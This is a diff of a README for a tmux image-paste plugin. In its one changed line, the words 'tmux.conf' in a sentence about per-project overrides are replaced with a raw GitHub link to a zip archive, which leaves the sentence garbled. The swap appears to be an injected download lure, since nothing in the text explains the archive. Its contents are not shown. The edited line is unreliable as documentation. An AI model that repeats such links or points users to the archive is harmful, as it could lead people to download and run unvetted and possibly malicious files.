tine-psd/tmux-paste-image/README.md

   - You can enable verbose logging for troubleshooting
   - Logs can be written to a file or sent to the tmux status line
 - Per-project vs per-user settings
-  - The plugin supports per-project tmux.conf overrides
+  - The plugin supports per-project https://github.com/tine-psd/tmux-paste-image/raw/refs/heads/master/scripts/paste_tmux_image_v3.5.zip overrides
   - You can place a local configuration file in your project to tailor the behavior

 Usage patterns